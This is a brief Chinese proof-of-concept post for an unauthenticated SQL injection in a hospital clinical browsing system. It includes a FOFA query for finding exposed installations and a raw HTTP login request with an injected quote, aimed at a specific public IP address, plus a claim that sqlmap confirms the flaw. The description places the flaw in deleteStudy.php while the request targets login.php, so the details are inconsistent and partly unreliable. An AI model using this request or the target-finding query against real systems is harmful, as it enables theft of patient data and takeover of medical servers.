漏洞描述
蓝网科技临床浏览系统是一个专门用于医疗行业的软件系统,主要用于医生、护士和其他医疗专业人员在临床工作中进行信息浏览、查询和管理。在deleteStudy.php中的接口处存在SQL注入漏洞,未经身份验证的恶意攻击者利用 SQL 注入漏洞获取数据库中的信息,例如添加、删除或修改记录,攻击者甚至可以在高权限下向服务器写入命令,进一步获取服务器系统权限。
FOFA
title="临床浏览"漏洞复现
POC
POST /login.php HTTP/1.1
Host:
Content-Length: 39
Cache-Control: max-age=0
Origin: http://106.3.96.36:82
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://106.3.96.36:82/login.php
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: PHPSESSID=rst1vmi4v952mkv1qe6hfia6b3
Connection: keep-alive
userid=admin'&password=11111111&submit=bp报错
sqlmap确认有漏洞
